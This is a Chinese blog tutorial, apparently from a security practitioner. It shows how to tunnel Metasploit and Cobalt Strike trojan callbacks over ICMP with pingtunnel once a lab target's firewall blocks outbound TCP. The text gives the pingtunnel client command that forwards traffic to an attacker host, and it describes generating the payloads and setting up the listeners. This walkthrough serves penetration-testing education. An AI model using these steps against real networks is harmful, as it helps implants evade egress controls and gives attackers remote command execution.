【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS

于 2024-08-24 20:15:35 发布
阅读量520 收藏 5
点赞数 20
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xt350488/article/details/141504246
版权
~ 会当凌绝顶,一览众山小 ~

前言

博客主页:h0ack1r丶羽~ 从0到1~

img

渗透测试中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,本文主要讲解了【靶机能上TCP和不能上TCP的区别】【利用pingtunnel搭建ICMP隧道,实现靶机上线MSF/CS的过程】,以及它的原理解释,如果哪里说错了,还请师傅们指出,谢谢您。

image-20240824194826922

靶机能上TCP

首先我们使用msfvenom生成widows木马 设置好payload

image-20240823144044493

开启监听

image-20240823144107736

运行即可上线

image-20240823144133503

正常情况下木马使用的是TCP协议,靶机能上网,那么靶机不能上网,阻止了防火墙出网呢?也不能走TCP访问攻击机器呢?这个时候MSF就不能通过TCP协议上线,下面将演示MSF通过ICMP协议上线靶机

阻止TCP连接环境搭建

检查网络通信,可以ping通百度

image-20240823144157593

也可以正常访问百度

image-20240824191834453

靶机启用防火墙

image-20240823155238044

kali攻击机器ping(访问)靶机就不通了

image-20240823144407488

靶机阻止防火墙所有出站TCP规则,也就是我们靶机访问不了外网,浏览器打不开百度了

image-20240823155314701

设置为阻止

image-20240823155334033

全部勾选

image-20240823155348975

这个时候可以ping通百度,但是tcp无法访问(浏览器访问网站这个操作,就是走的TCP协议),而ping使用的是icmp协议,所以可以ping通百度,也可以ping(访问)通我们的攻击机

image-20240823155435817

没上线成功的过程就不演示了,作用不大

注:木马走的都是tcp协议,此时我们禁用了TCP协议,msf就无法上线,该怎么绕过呢?

工具使用

这时候我们就需要一个工具

MSF隧道搭建工具pingtunnel

工具链接

链接:百度网盘 请输入提取码 提取码:1212

PingTunnel是一款常用的ICMP隧道工具,可以跨平台使用,为了避免隧道被滥用,还可以为隧道设置密码。pingtunnel工具是基于网络层面ICMP协议的内网穿透工具。

在本次教程中它的主要作用,如图

image-20240824181507710

这张图主要介绍了两个部分

1、靶机使用容器,将tcp数据包打包为icmp数据包

2、msf接收的时候,将icmp数据包还原成tcp数据包

实现过程

下载好工具后把他移到kali中

image-20240824181921093

kali启用PingTunnel服务器

image-20240823154349816

此时kali生成的木马需要是127.0.0.1,端口为靶机监听的地址(原理待会解释)

image-20240823173154040

PingTunnel把木马的TCP数据包封装为ICMP数据包,这时候就可以通过ICMP协议发送到攻击机服务器

工具使用教程如下

image-20240823155549529

命令解释

image-20240824182555235

pingtunnel -type client -l 127.0.0.1:8888 -s 192.168.209.151 -t 192.168.209.151:9999 -tcp 1

image-20240823164547494

运行

image-20240823162427792

查看kali服务端,icmp协议已成功收到靶机的访问请求

image-20240823163445198

MSF设置监听端口9999,本地地址为0.0.0.0全局地址

image-20240823172553344

当PingTunnel服务器接收到靶机的ICMP数据包的时候,PingTunnel就会将ICMP数据包拆解为TCP数据包,这时候MSF就会接收到此”TCP请求“,即可成功利用icmp隧道成功上线MSF

image-20240823172227455

执行命令

image-20240823172504686

原理解释

再来看这张图

image-20240824181507710

结合上面的结构图和这个案例即可得到原理,攻击机器生成木马,并传到靶机上,靶机运行木马在本地的8888端口,而PingTunnel在靶机上将这个端口的TCP流量打包,转发到攻击机刚刚开启的PingTunnel服务器,PingTunnel服务器接收到这个icmp请求之后,将这个ICMP包进行拆解转化为TCP协议,最后将这个TCP协议转发到攻击机器(kali)MSF监听的端口,此时就可以完成MSF上线

CS通过ICMP上线

CS也是一样的原理,主机cs生成木马,送到靶机,添加两个监听器,靶机自己监听地址

image-20240823175907442

kali接受shell地址

image-20240823181221244

如下

image-20240823181239100

生成payload,选择靶机的监听地址

image-20240823175957426

放入靶机

image-20240823180638826

运行木马之后,再运行pingtunnel,转发到攻击机的服务器

pingtunnel -type client -l 127.0.0.1:8888 -s 192.168.209.151 -t 192.168.209.151:9999 -tcp 1

成功上线,如果没上线成功,这个红色的框一定要检查是否正确

image-20240823181140245

whoami

image-20240823181342411

总结

本文详细讲解了在内网渗透中,当常规的网络通信手段(如TCP协议)受阻时,如何利用ICMP隧道技术实现MSF和CS的上线。通过搭建PingTunnel服务器,将TCP数据包封装在ICMP数据包中,利用ICMP协议进行数据传输,从而绕过网络限制。文章还详细解释了ICMP隧道的工作原理,并通过实际案例展示了其应用过程。

image-20240821152514635

感今怀昔

最新可用,bp+charles小程序抓包教程

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【kali笔记】一款强大的Web目录扫描工具DIRB使用指南

PwnLab: init-文件包含、shell反弹、提权--靶机渗透思路讲解【附靶机链接】

PHP反序列化漏洞从入门到深入8k图文介绍,以及phar伪协议的利用

小羽网安
关注
  • 20
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Bt5+msf+ettercap内网渗透
01-20
kali linux 内网渗透视频教程,详细的操作过程和原理。
msf内网渗透
10-29
在IT安全领域,尤其是渗透测试和网络攻防中,“msf内网渗透”是一个关键话题,涉及到了Metasploit框架(简称MSF)在内部网络中的应用与实践。这一过程通常包括了渗透测试前的环境准备、利用MSF生成有效载荷、设置web...
内网渗透讲解与实验手册
05-16
### 内网渗透讲解与实验手册 #### 一、内网渗透概述 内网渗透测试是一种模拟黑客行为的安全评估活动,旨在发现并利用组织内部网络中的安全漏洞。它可以帮助企业了解其网络安全防御体系的强度,并识别潜在的安全...
浅谈MSF渗透测试
02-24
在渗透过程中,MSF漏洞利用神器是不可或缺的。更何况它是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、...
MSFconsole(msf渗透神器)windows平台可以 使用,亲测可用
11-27
"MSFconsole(msf渗透神器)windows平台可以使用,亲测可用" 指出该资源是Metasploit Framework(简称MSF)的一个版本,特别适用于Windows操作系统,并且已经被验证为可正常运行。MSFconsole是Metasploit Framework的...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8411
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于微信小程序网上商城设计设计与实现.docx
08-23
基于微信小程序网上商城设计设计与实现.docx
各种业务架构图.pdf
08-23
各种业务架构图.pdf
基于ssm和vue的 校园疫情防控系统源码 (优秀毕业设计源码)
08-23
1. 校园疫情防控系统代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是ssm,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
某自动化立体仓库规划设计方案.pdf
08-23
某自动化立体仓库规划设计方案.pdf
weixin174基于微信小程序的教学质量评价系统ssm.zip
08-23
本基于微信小程序的教学质量评价系统有管理员,教师,学生三个角色。管理员功能有个人中心,学生管理,教师管理,课程类别管理,课程信息管理,教学评价管理,系统管理。微信小程序部分教师和学生都可以注册登录,教师可以查看课程信息并且可以查看学生的评价,学生可以查看课程信息,教师信息,并且可以对教师的教学质量进行评价操作,还可以查看校园资讯。。因而具有一定的实用性。 本站后台采用Java的SSM框架进行后台管理开发,可以在浏览器上登录进行后台数据方面的管理,MySQL作为本地数据库,微信小程序用到了微信开发者工具,充分保证系统的稳定性。系统具有界面清晰、操作简单,功能齐全的特点,使得基于微信小程序的教学质量评价系统管理工作系统化、规范化
医疗健康年终总结PPT模板.pptx
08-23
年终总结 新年计划 述职报告 工作汇报 医疗报告 员工转正 季度报告 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
weixin197基于JAVA的微信食堂线上订餐小程序的设计与实现ssm.zip
08-23
微信食堂线上订餐小程序可以实现商品管理,商品评价管理,商家管理,公告管理,商品订单管理,在线充值等功能。该系统采用了SSM框架,Mysql数据库,Java语言等技术实现管理员后台,采用微信开发者工具来对用户小程序端进行了开发。 微信食堂线上订餐小程序让商品订单,商家信息,商品信息等相关信息集中在后台让管理员管理,让用户在小程序端订餐,管理个人订单,该系统让信息管理变得高效,也让用户订餐,查看个人订单等信息变得越来越方便。
【kafka消息助手】可以连接kafka,并且发送消息到kafka中
最新发布
08-23
【Kafka消息助手】是一款高效、稳定的 Kafka 客户端工具,旨在帮助用户轻松连接 Kafka 集群,实现消息的快速发送与接收。这款助手以其强大的功能和便捷的操作,成为开发者们在处理 Kafka 消息传递过程中的得力助手。 【Kafka消息助手】的核心功能之一便是连接 Kafka 集群。用户只需简单配置 Kafka 集群的地址、端口以及相关认证信息,即可建立起与 Kafka 的稳定连接。助手支持多种连接方式,包括直连、SSL 加密连接等,满足不同场景下的安全需求。 连接成功后,【Kafka消息助手】便可以发送消息到 Kafka 中。用户可以通过助手自带的发送界面,轻松构建消息内容,并指定发送至哪个主题(Topic)和分区(Partition)。助手支持多种消息格式,如文本、JSON、XML 等,方便用户根据实际需求选择。在发送消息时,用户还可以自定义消息的键(Key)和头信息(Headers),以满足更复杂的业务场景。
跨越边界:软件与操作系统兼容性的终极解决策略
08-23
编程故障处理,也常被称为调试(Debugging),是软件开发过程中识别、分析和修复程序中错误或故障的过程。它是确保软件质量和可靠性的关键环节。以下是编程故障处理的详细解释: ###故障发生的原因 - **语法错误**:编程语言的规则没有正确遵守。 - **逻辑错误**:程序实现了错误的逻辑或算法。 - **运行时错误**:程序在运行时遇到了未预见的情况,如除以零、数组越界等。 - **资源问题**:内存不足、磁盘空间不足等。 - **外部依赖故障**:依赖的外部系统或服务不可用。 ### 故障处理的步骤 - **识别问题**:通过用户反馈、测试结果或监控报警发现问题。 - **复现问题**:在可控环境中稳定复现问题,为进一步分析做准备。 - **信息收集**:收集相关的日志、错误信息、堆栈跟踪等数据。 - **分析问题**:根据收集到的信息,分析问题的可能原因。 - **定位问题**:确定问题发生的具体位置,如代码行、模块或系统组件。 - **制定修复方案**:根据问题原因,设计解决方案或修复措施。 - **实施修复**:在开发环境中实施修复,并进行单元测试。 - **测试验证
weixin170健身达人微信小程序的设计与实现ssm.zip
08-23
如今的信息时代,对信息的共享性,信息的流通性有着较高要求,因此传统管理方式就不适合。为了让管理模式进行升级,也为了更好的维护信息,健身达人微信小程序的开发运用就显得很有必要。并且通过开发健身达人微信小程序,不仅可以让所学的微信小程序技术得到实际运用,也可以掌握MySQL的使用方法,对自身编程能力也有一个检验和提升的过程。尤其是通过实践,可以对系统的开发流程加深印象,无论是前期的分析与设计,还是后期的编码测试等环节,都可以有一个深刻的了解。 借助于健身达人微信小程序这样的工具,让信息系统化,流程化,规范化是最终的发展结果,让其遵循实际操作流程的情况下,对信息实施规范化处理,让信息通过电子的方式进行保存,无论是管理人员检索信息,可以便利化操作,真正缩短信息处理时间,节省人力和信息管理的成本。
ChromeiumFXDemo-master【vue2+winform】
08-23
谷歌浏览器中实现c#和winform通讯
weixin217基于微信小程序的学生签到系统设计与实现ssm.zip
08-23
社会发展日新月异,用计算机应用实现数据管理功能已经算是很完善的了,但是随着移动互联网的到来,处理信息不再受制于地理位置的限制,处理信息及时高效,备受人们的喜爱。所以各大互联网厂商都瞄准移动互联网这个潮流进行各大布局,经过多年的大浪淘沙,各种移动操作系统的不断面世,而目前市场占有率最高的就是微信小程序,本次开发一套基于微信小程序的生签到系统,有管理员,教师,学生三个角色。管理员功能有个人中心,学生管理,教师管理,签到管理,学生签到管理,班课信息管理,加入班课管理,请假信息管理,审批信息管理,销假信息管理,系统管理。教师和学生都可以在微信端注册和登录,教师可以管理签到信息,管理班课信息,审批请假信息,查看学生签到,查看加入班级,查看审批信息和销假信息。学生可以查看教师发布的学生签到信息,可以自己选择加入班课信息,添加请假信息,查看审批信息,进行销假操作。基于微信小程序的生签到系统服务端用Java开发的网站后台,接收并且处理微信小程序端传入的json数据,数据库用到了MySQL数据库作为数据的存储。这样就让用户用着方便快捷,都通过同一个后台进行业务处理,而后台又可以根据并发量做好部署,用硬件和软件进行协作,满足于数据的交互式处理,让用户的数据存储更安全,得到数据更方便。
基于ssm和vue的 电动车智能充电服务平台源码 电动车智能充电服务平台代码(高分毕设项目源码)
08-23
1. 电动车智能充电服务平台代码说明:经导师指导并认可通过的98分毕设项目代码。 2.适用对象:本代码学习资料适用于计算机、电子信息工程、数学等专业正在做毕设的学生,需要项目实战练习的学习者,也适用于课程设计、期末大作业。 3.技术栈:前端是vue,后端是ssm,项目代码都经过严格调试,代码没有任何bug! 4. 作者介绍:大厂码农,java领域创作者,阿里云开发社区乘风者计划专家博主,专注于大学生项目实战开发,文章底部有博主联系方式,更多优质系统、项目定制请私信。 5. 最新计算机软件毕业设计选题大全: https://blog.csdn.net/weixin_45630258/article/details/135901374
msf和frp内网穿透
08-19
msf和frp都是常用于内网穿透的工具,可以帮助远程访问和控制内网中的设备。 Metasploit Framework(简称msf)是一个开源的渗透测试框架,它提供了丰富的渗透测试工具和模块。虽然msf主要是用于渗透测试和漏洞利用,但它也可以通过反向连接来实现内网穿透。你可以在目标机器上执行一个反向Shell并将其连接到外部控制台,从而实现对内网设备的访问。 Frp是一个高性能的反向代理工具,可以帮助将内网服务暴露到公网中,实现内网穿透。通过在内网中启动Frp客户端,并在公网服务器上启动Frp服务器端,你可以将内网中的服务映射到公网IP上,从而实现对内网设备的远程访问。 总之,无论你选择使用msf还是frp,都可以帮助你实现内网穿透,让你可以方便地远程访问和控制内网中的设备。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小羽网安

公众号【小羽网安】

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值